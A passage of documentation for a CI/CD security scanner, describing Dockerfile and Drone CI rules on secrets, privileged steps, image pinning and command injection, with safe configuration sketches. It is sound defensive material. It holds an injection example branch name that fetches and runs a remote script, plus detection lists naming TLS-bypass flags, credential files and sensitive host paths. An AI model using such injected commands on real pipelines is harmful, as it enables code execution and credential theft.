How this is detected. Reuses _primitives/secret_shapes: it flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.

Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history; even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
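
A sketch of the build-time secret mount (requires BuildKit); the secret id and the configure script name are illustrative:

```dockerfile
# Bad: a literal in ENV is readable forever via `docker history --no-trunc`.
# ENV API_KEY=AKIA...

# Build-time secret, supplied out of band:
#   docker build --secret id=api_key,src=./api_key.txt .
# The value exists only for the duration of this RUN and never lands in a layer.
RUN --mount=type=secret,id=api_key \
    ./scripts/configure.sh "$(cat /run/secrets/api_key)"
```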

Source: DF-006 in the Dockerfile provider.

DF-007: No HEALTHCHECK directive declared LOW 🔧 fix

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. This is a defense-in-depth signal rather than an exploitation indicator, hence the LOW severity. A missing healthcheck doesn't create a vulnerability on its own, but downstream orchestrators (Kubernetes, ECS, Compose) cannot recover an unhealthy container they cannot detect, and that turns a soft failure (slow leak, deadlock) into a stale-process incident.

Recommendation. Declare a HEALTHCHECK so the orchestrator can detect stuck or zombie containers. Example: HEALTHCHECK --interval=30s --timeout=5s --retries=3 CMD curl -fsS http://localhost/healthz || exit 1. Skip this for builder/multi-stage intermediate images; only the runtime image needs one.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: DF-007 in the Dockerfile provider.

DF-008: RUN invokes docker --privileged or escalates capabilities HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build a path to escape to the build host's docker daemon, and any tampered base image can exploit the elevated build.

Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.

Source: DF-008 in the Dockerfile provider.

DF-009: ADD used where COPY would suffice LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Pure-local ADD <path> <dest> is functionally identical to COPY, but ships extra feature surface (URL fetch, tarball auto-extract) that adds nothing and turns a benign-looking filename change into a behavior change. The Docker docs have recommended COPY for non-URL inputs since 2014.

Recommendation. Replace ADD ./local with COPY ./local. ADD has two implicit behaviors that make it the wrong default. It fetches HTTP(S) URLs and it auto-extracts .tar / .tar.gz archives. Both are easy to invoke accidentally and neither is reproducible. Reserve ADD for a deliberate URL-pull (covered by DF-003) or an explicit tarball extract.

Source: DF-009 in the Dockerfile provider.

DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.

Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
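
A sketch of the reproducible shape. The digest placeholder and the package version string are illustrative; resolve your own digest and pin the versions your workload actually needs:

```dockerfile
# Base pinned by digest (per DF-001); resolve the placeholder with
#   docker buildx imagetools inspect debian:bookworm-slim
FROM debian:bookworm-slim@sha256:<digest>

# Install pinned versions instead of running `apt-get upgrade`:
# two builds of this file from the same base produce the same package set.
RUN apt-get update \
 && apt-get install -y --no-install-recommends curl=7.88.* \
 && rm -rf /var/lib/apt/lists/*
```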

Source: DF-010 in the Dockerfile provider.

DF-011: Package manager install without cache cleanup in same layer LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Each Dockerfile RUN produces a layer. Installing packages in one layer and cleaning the cache in a later layer leaves the cache files in the lower layer forever: the final image size is unchanged, and the residual files broaden the attack surface (e.g. apt's signed-by keys, package metadata). The fix is layout, not behavior: do install + cleanup in the same RUN.

Recommendation. Combine the install and cleanup into the same RUN so the cache lands in a single layer that gets discarded together. Idiomatic pattern: RUN apt-get update && apt-get install -y <pkgs> && rm -rf /var/lib/apt/lists/*. Equivalent forms: apk add --no-cache <pkgs>, dnf install -y … && dnf clean all, yum install -y … && yum clean all, zypper -n in … && zypper clean -a.
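
The layer mechanics side by side, using apt as the example package manager:

```dockerfile
# Bad: the cache is committed in the first layer and survives the later cleanup.
# RUN apt-get update && apt-get install -y ca-certificates
# RUN rm -rf /var/lib/apt/lists/*

# Good: install and cleanup share one layer, so the cache is never committed.
RUN apt-get update \
 && apt-get install -y --no-install-recommends ca-certificates \
 && rm -rf /var/lib/apt/lists/*
```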

Source: DF-011 in the Dockerfile provider.

DF-012: RUN invokes sudo HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.

Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
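
A sketch of the USER-toggle pattern for the non-root case; the user name and the installed package are illustrative:

```dockerfile
FROM debian:bookworm-slim
RUN useradd --create-home app
USER app

# One step genuinely needs root: switch explicitly instead of invoking sudo,
# then drop back to the unprivileged user.
USER root
RUN apt-get update \
 && apt-get install -y --no-install-recommends tini \
 && rm -rf /var/lib/apt/lists/*
USER app
```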

Source: DF-012 in the Dockerfile provider.

DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.

Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: DF-013 in the Dockerfile provider.

DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface: at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.

Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories; pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.

Source: DF-014 in the Dockerfile provider.

DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.

Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a Stack Overflow answer and almost never the correct fix.

Known false positives.

  • Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use 777. Suppress with an ignore-file entry rather than weakening the rule.

Source: DF-015 in the Dockerfile provider.

DF-016: Image lacks OCI provenance labels LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.

Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
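
A sketch of the label block, fed from build args so the values track the actual build; the arg names and the example repo URL are illustrative:

```dockerfile
# Supply at build time, e.g.
#   docker build --build-arg GIT_SHA="$(git rev-parse HEAD)" .
ARG GIT_SHA
ARG REPO_URL=https://github.com/example/app

LABEL org.opencontainers.image.source=$REPO_URL \
      org.opencontainers.image.revision=$GIT_SHA
```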

Known false positives.

  • A multi-stage build's intermediate stages don't need provenance labels; only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final FROM is an intentional throwaway scratch stage.

Source: DF-016 in the Dockerfile provider.

DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.

Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: DF-017 in the Dockerfile provider.

DF-018: RUN chown rewrites ownership of a system path MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful; the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.

Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.

Source: DF-018 in the Dockerfile provider.

DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded; the rule reads the literal source token.

Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
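
A sketch of the build-time mount replacing a COPY of .npmrc; the secret id and the source path in the build command are illustrative:

```dockerfile
# syntax=docker/dockerfile:1
# Instead of `COPY .npmrc /root/.npmrc`, mount the file for one step only.
# Build with: docker build --secret id=npmrc,src=$HOME/.npmrc .
FROM node:20-bookworm-slim
WORKDIR /app
COPY package.json package-lock.json ./

# The mounted file is visible only during this RUN; no layer ever contains it.
RUN --mount=type=secret,id=npmrc,target=/root/.npmrc npm ci
COPY . .
```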

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Empty placeholder files (.env shipped as a template, config.json carrying only public flags). Suppress with a brief .pipelinecheckignore rationale and prefer an explicit non-secret name (.env.example).

Source: DF-019 in the Dockerfile provider.

DF-020: ARG declares a credential-named build argument HIGH 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone (ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD), even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.

Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag; the secret never lands in a layer or in the build history.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • An ARG whose name matches the regex but is a non-secret config knob (a counter-example like ARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.

Source: DF-020 in the Dockerfile provider.

DR-001: Step image not pinned to a digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection mirrors the GL-001 / JF-009 / ADO-009 / CC-003 family: any container image: whose ref doesn't end in @sha256:<64 hex> fires. :latest and missing-tag references emit the strongest message; a specific-version tag (golang:1.21.5) still fires but can be fixed with a one-line digest swap. The rule scopes itself to type: docker / kubernetes pipelines (the container-flavored ones); ssh / exec / digitalocean pipelines have no image: field and pass by default.

Recommendation. Pin every step image: (and every services: image) to @sha256:<digest>. Drone resolves the image ref at run time, so a tag like golang:1.21 resolves against whatever the registry currently serves and a compromised registry can swap content under a fixed tag. Capture the digest once with docker buildx imagetools inspect golang:1.21 (or crane digest golang:1.21) and update the digest deliberately when the upstream version moves.
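
A sketch of the pinned shape in Drone YAML; the digest is a placeholder to resolve yourself, and the step content is illustrative:

```yaml
kind: pipeline
type: docker
name: build

steps:
  - name: test
    # Placeholder digest: resolve the real one with
    #   crane digest golang:1.21.5
    image: golang:1.21.5@sha256:<digest>
    commands:
      - go test ./...
```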

Known false positives.

  • Local-build images (image: my-org/build-tools:dev produced upstream in the same pipeline) sometimes can't be digest-pinned because the digest depends on the build. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape; the floating-tag risk still applies to every public-registry pull.

Source: DR-001 in the Drone CI provider.

DR-002: Step runs with privileged: true HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Drone's privileged: true is a step-scoped switch that maps directly to docker run --privileged. The rule fires on either steps or services declaring the flag. The agent admin can also globally allow / deny privileged steps via the repository's trusted flag; the rule doesn't try to reach into Drone's server config and assumes the worst (a malicious or accidentally-trusted repo), so a privileged: true in source is always a finding.

Recommendation. Drop privileged: true from the step. The flag removes the container's syscall and capability boundary, giving the step kernel-level access to the agent host. Most workloads that reach for it are Docker-in-Docker pipelines that can use a rootless alternative (buildx, kaniko, buildah --isolation=chroot) instead. If the workload genuinely needs syscalls, scope down with explicit cap_add: [SYS_ADMIN] and an isolated runner pool, rather than blanket privileged.

Source: DR-002 in the Drone CI provider.

DR-003: Untrusted Drone template variable in shell command HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. User-controllable substitution sources flagged by this rule:

  • DRONE_COMMIT_MESSAGE / DRONE_COMMIT_AUTHOR*
  • DRONE_PULL_REQUEST_TITLE / DRONE_PULL_REQUEST_BRANCH
  • DRONE_TAG_MESSAGE (tag annotations are author-controlled)
  • DRONE_BRANCH / DRONE_SOURCE_BRANCH / DRONE_TARGET_BRANCH (branch names are pushable, so an attacker can craft a name like ;curl evil.sh|sh)
  • DRONE_REPO_* (in fork PRs the repo metadata comes from the fork)

The rule only fires on unquoted uses inside a command body. Quoted ("${DRONE_*}") or single-quoted uses are safe in POSIX shell because the substitution runs after Drone's templating but the shell still tokenises the expanded value as a single argument. Same model as the Tekton TKN-003 / Argo ARGO-005 / Buildkite BK-003 rules in this catalog.

Recommendation. Treat user-controllable Drone template variables as tainted. Drone substitutes ${DRONE_*} tokens before the shell parses the command, so an unquoted use is a textbook command-injection primitive. The safe pattern is to copy the value into the step's environment: block (MSG: ${DRONE_PULL_REQUEST_TITLE}) and reference the env var quoted in the command (echo "$MSG"). Drone's own docs call out the same hardening for build-message / commit-author fields.
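
The env-indirection pattern from the paragraph above, as a Drone step; the step name and image are illustrative:

```yaml
steps:
  - name: notify
    image: alpine:3.20
    environment:
      # Drone substitutes the tainted value here, outside the shell's parse.
      MSG: ${DRONE_PULL_REQUEST_TITLE}
    commands:
      # Quoted expansion: the shell passes the value as one argument, never as code.
      - echo "PR title: $MSG"
```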

Known false positives.

  • Trusted-only Drone variables (DRONE_BUILD_NUMBER, DRONE_BUILD_STATUS, DRONE_REPO_NAMESPACE for non-fork repos) aren't user-controllable and are safe to interpolate unquoted. Drone-template syntax can also appear in YAML strings outside commands:; this rule only scopes itself to step command bodies, so an unquoted use in (say) settings.message: doesn't fire here; those land under DR-004 / SBOM-style audits.

Source: DR-003 in the Drone CI provider.

DR-004: Literal credential in step environment / settings CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. The rule fires on credential-shaped values where the key name suggests a secret (token, password, secret, key, apikey, api_key, access_key, private_key, auth, credentials) and the value is a plain string rather than a {from_secret: NAME} reference. AWS-style AKIA... keys also fire regardless of the key name (matching the AWS canonical access-key shape). Empty strings and the explicit literal null are not flagged: an empty value is a configuration bug, not a leaked credential. Same model as BK-002 / TKN-005 / ARGO-006 in this catalog.

Recommendation. Move every literal credential into a Drone secret (drone secret add --repository OWNER/REPO --name MY_SECRET --value ...) and reference it via the from_secret: mechanism: MY_SECRET: { from_secret: MY_SECRET }. The same applies to plugin settings: blocks. Drone redacts from_secret values from log output but does NOT redact literals, so a pasted token in source ends up in the build log indefinitely.
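
A sketch of the from_secret shape on both an environment: entry and a plugin settings: block; the secret names and plugin are illustrative:

```yaml
steps:
  - name: publish
    image: plugins/docker:20.13.0
    settings:
      repo: example/app
      # Resolved from Drone's secret store at run time; redacted from logs.
      username: { from_secret: docker_username }
      password: { from_secret: docker_password }
    environment:
      API_TOKEN: { from_secret: api_token }
```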

Known false positives.

  • Configuration values that happen to use a credential-shaped key name but never carry a secret (DOCKER_CONFIG=/dev/null to suppress credential loading) sometimes trip this rule. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape; the broader credential-vocab match still catches real leaks elsewhere in the pipeline.

Source: DR-004 in the Drone CI provider.

DR-005: Plugin step uses a floating image tag HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Drone treats a step as a plugin when it has a settings: block. The image: field still names the container that runs, and the same supply-chain argument as DR-001 applies; this rule fires specifically on plugin steps using a floating tag (:latest, no tag, or a non-version-shaped tag) rather than every unpinned image, so a maintainer weighing trade-offs can ratchet plugin pinning up first. A pinned-version tag (plugins/docker:20.13.0) passes this rule but still trips DR-001 for the wider supply-chain hardening.

Recommendation. Pin every plugin step's image: to @sha256:<digest> or, at minimum, a specific version tag (plugins/docker:20.13.0 rather than plugins/docker:latest or plugins/docker). Plugin steps are a sharper attack surface than ordinary steps because Drone passes every settings: key to the plugin as an environment variable, including any secret references; a malicious plugin replacement can exfiltrate the entire credential set the step was trusted with.

Known false positives.

  • Internal-registry plugins built and pushed by the same pipeline (image: my-org/internal-plugin:dev produced upstream) sometimes can't be exact-pinned. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape.

Source: DR-005 in the Drone CI provider.

DR-006: TLS verification disabled in step commands HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection is the same blob-regex used by GHA-027, BK-008, JF-022, ADO-026, CC-024, and the CFN/Terraform rule packs. Matches: curl --insecure / -k, wget --no-check-certificate, pip config set global.trusted-host, npm config set strict-ssl false, yarn config set strict-ssl false, git config http.sslverify false, GIT_SSL_NO_VERIFY=1, NODE_TLS_REJECT_UNAUTHORIZED=0, PYTHONHTTPSVERIFY=0, and GOINSECURE=.... The rule scans every commands: entry on every step.

Recommendation. Remove TLS-bypass flags from build commands. The most common offenders are curl --insecure / -k / wget --no-check-certificate, pip config set global.trusted-host, npm config set strict-ssl false, and git -c http.sslverify=false. Each exposes the build to TLS-MITM injection of a registry-served payload, which is a textbook supply-chain attack vector. If a registry's certificate is genuinely broken, fix the registry rather than permanently disabling verification; the bypass tends to outlive the broken cert and become a permanent weakness.

Source: DR-006 in the Drone CI provider.

DR-007: Step mounts a sensitive host path HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Drone's pipeline-level volumes: block accepts either temp: (an ephemeral tmpfs, safe) or host: { path: ... } (a bind mount of the agent's filesystem, the dangerous shape). The rule fires when any pipeline-level volume's host.path matches a sensitive prefix:

  • /var/run/docker.sock — the canonical Docker-in-Docker escape; equivalent to --privileged for container takeover purposes;
  • /var/lib/docker — exposes every image / container on the host;
  • /etc — config + credential files;
  • /proc / /sys — host kernel state;
  • / — full host takeover.

The rule fires on the volume declaration, not on step-level mounts. A pipeline that declares a sensitive host volume but no step actually mounts it is still flagged: the declaration alone signals the agent's Drone runner is configured to permit the bind mount, which is itself a risk-shape decision worth review.

Recommendation. Drop the host volume from the pipeline. Mounting /var/run/docker.sock from the agent host into a build container hands the container root-equivalent control over every other workload on the same agent (it can spawn arbitrary containers, including privileged ones). /var/lib/docker exposes every image and container on the host, /proc and /sys expose the host kernel state, and / (the host root) is full takeover. If the build genuinely needs Docker, run a rootless alternative (kaniko, buildah --isolation=chroot, docker buildx against a remote builder) or use Drone's trusted: true repo flag plus a dedicated host-isolated runner pool, rather than mounting the shared host's socket.
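
A sketch of the safe temp: shape for sharing scratch space between steps without exposing the agent filesystem; the volume and step names are illustrative:

```yaml
kind: pipeline
type: docker
name: build

volumes:
  # Ephemeral tmpfs (the safe shape), instead of host: { path: /var/run/docker.sock }.
  - name: scratch
    temp: {}

steps:
  - name: build
    image: alpine:3.20
    volumes:
      - name: scratch
        path: /shared
    commands:
      - cp -r build-output /shared/
```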

Known false positives.

  • Trusted-only pipelines on a dedicated runner fleet (no fork-PR access, no untrusted contributors) sometimes deliberately mount the Docker socket for image build / push workflows. Suppress via ignore-file when this is the deliberate posture and the runner pool's isolation is documented elsewhere; the rule has no way to know whether trusted: true is set on the repo from the pipeline YAML alone.

Source: DR-007 in the Drone CI provider.

DR-008: Step uses pull: never (skips registry verification) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Drone supports three pull: policies on a step: always (re-fetch + verify on every build, the default), if-not-exists (use cache when present, otherwise pull), and never (use cache only). The never policy is the dangerous one because it skips the digest verification an always pull would perform, and there's no out-of-band signal that the cached image is the one the manifest names. The rule fires on either steps or services declaring pull: never. pull: if-not-exists is treated as acceptable: it's tolerable when paired with a digest-pinned image: (DR-001) and a deliberate operational decision; the explicit-skip case (never) is what TAINT-class supply-chain attacks lean on.

Recommendation. Drop the pull: never directive (or change it to pull: always / pull: if-not-exists). pull: never tells the Drone agent to skip the registry round-trip entirely, so the agent runs whatever image bytes it cached on a previous build without re-verifying the digest. If a compromised image ever landed in the agent's local cache (a poisoned registry tag, a manual docker pull during a debug session, a co-resident workload that pulled a malicious image), the cached bytes keep running until an operator manually clears the cache. pull: always (the Drone default) re-fetches and verifies on every build; pull: if-not-exists is acceptable when the image is digest-pinned (DR-001) so the cache key is content-addressed.

Known false positives.

  • Air-gapped or registry-pinned environments sometimes set pull: never deliberately because the agent never has registry access in the first place. Suppress via ignore-file when this is the deliberate shape; the runner's network isolation then carries the integrity guarantee instead of the registry round-trip.

Source: DR-008 in the Drone CI provider.

DR-009: Cache plugin key embeds an attacker-controllable Drone variable HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Drone has no first-party cache keyword; pipelines use plugin steps (drone-cache, drone-volume-cache, drone-s3-cache, etc.) configured via settings:. The rule fires on any plugin step whose settings.cache_key (or related key, mount, filename, restore_keys) interpolates a tainted Drone variable. Tainted vocabulary mirrors DR-003: $DRONE_BRANCH, $DRONE_PULL_REQUEST*, $DRONE_COMMIT_*MESSAGE, $DRONE_TAG_MESSAGE, and the fork-PR-shaped $DRONE_REPO_* family. The attack model is well-documented (GHA-011 catches the same shape on the GitHub Actions side).

Recommendation. Don't embed PR-controlled or branch-controlled Drone variables in cache keys. The canonical safe shape is to key on commit-stable inputs only: a checksum of the dependency lockfile, or a key like ${DRONE_REPO_BRANCH}-${DRONE_COMMIT_SHA} (unique per commit; ${DRONE_BRANCH} alone is attacker-controllable). When two builds need to share a cache, key on the dependency manifest's hash, not on any branch / PR / repo metadata that a fork PR can shape. If a fork PR's cache write can ever be read back by a trusted-context build (the same key on a different branch), the attacker can inject malicious build artifacts into the trusted run.
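
A sketch of a lockfile-keyed cache step; the plugin image, its version tag, and the key template are illustrative (drone-cache shown as one common choice):

```yaml
steps:
  - name: restore-cache
    image: meltwater/drone-cache:v1.4.0
    settings:
      restore: true
      # Key derives from lockfile content only: commit-stable, nothing a
      # fork PR's branch name, title, or repo metadata can shape.
      cache_key: '{{ checksum "package-lock.json" }}'
      mount:
        - node_modules
```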

Known false positives.

  • Plugins that namespace cache reads by branch on the write side and never read across branches (a deliberate cache partitioning) are technically safe: the attacker can poison their own branch's cache but can't reach the trusted-branch one. The rule has no way to verify partition boundaries at scan time; suppress via ignore-file scoped to the specific step name when the partitioning is audited.

Source: DR-009 in the Drone CI provider.

DR-010: Step commands run unpinned package installs MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. The same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Buildkite / Tekton / Argo. Drone was the missing port; this closes the gap.

Insecure variants matched (PKG_INSECURE_RE): pip --index-url http://, pip --trusted-host, npm --registry http://, gem --source http://, nuget --Source http://, cargo --index http://. Lockfile-bypass variants (PKG_NO_LOCKFILE_RE): npm install (should be npm ci), bare pip install <pkg> without -r or --require-hashes, yarn install without --frozen-lockfile, bundle install without --frozen, cargo install, go install without an @vN.N pin, poetry install without --no-update.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. For pip, use pip install --require-hashes -r requirements.txt or -r requirements.txt with hashes baked into the lock; pip install <package> without a version pin or lockfile flag is the unsafe shape. For npm, prefer npm ci over npm install so the lockfile is load-bearing. Yarn: yarn install --frozen-lockfile. Bundle: bundle install --frozen. Cargo / go install: always pin to a tag or commit. Do NOT use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (DR-006 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape; the broader pinning policy still covers the rest of the pipeline.

Source: DR-010 in the Drone CI provider.

DR-011: node map interpolates attacker-controllable Drone variable HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-7 Insecure System Configuration.

How this is detected. Drone substitutes ${VAR} template tokens against the build context before the runner picks an agent. The rule walks the pipeline-level node: map (Drone doesn't expose a per-step variant) for any reference to the same author-controllable variables DR-003 tracks (DRONE_BRANCH, DRONE_TAG, DRONE_PULL_REQUEST_*, DRONE_COMMIT_AUTHOR*, DRONE_COMMIT_MESSAGE, DRONE_REPO).

Detection is value-only and case-sensitive against the documented variable names; trusted server-controlled fields like DRONE_BUILD_NUMBER and DRONE_REPO_NAMESPACE (for non-fork repos) aren't on the tainted list. This closes the parity gap with BK-015 / GHA-036 / GL-032 / JF-032 / ADO-030 / CC-031.

Recommendation. Pin every node: map entry to a static literal that matches your runner-targeting policy. Drone uses node: to route a pipeline to runners with matching labels (e.g. node: { instance: ci-prod-amd64 }). When the map value interpolates ${DRONE_BRANCH} / ${DRONE_PULL_REQUEST_*} / ${DRONE_COMMIT_AUTHOR}, the pusher gets to pick which runner pool runs the pipeline, including a privileged pool reserved for the deploy step. Production runner pools should also carry a label the agent itself enforces (the runner's DRONE_RUNNER_LABELS env var, plus a server-side policy on which repos can target which labels) so the rule is one layer of defense-in-depth.
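
A sketch of the safe shape in .drone.yml (the label name is illustrative; match it to your runner-targeting policy):

```yaml
kind: pipeline
type: docker
name: deploy

# Static literal only: the pusher cannot steer the pipeline onto a
# privileged runner pool. Interpolating ${DRONE_BRANCH} or another
# author-controllable variable here is the shape the rule flags.
node:
  instance: ci-prod-amd64
```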

Known false positives.

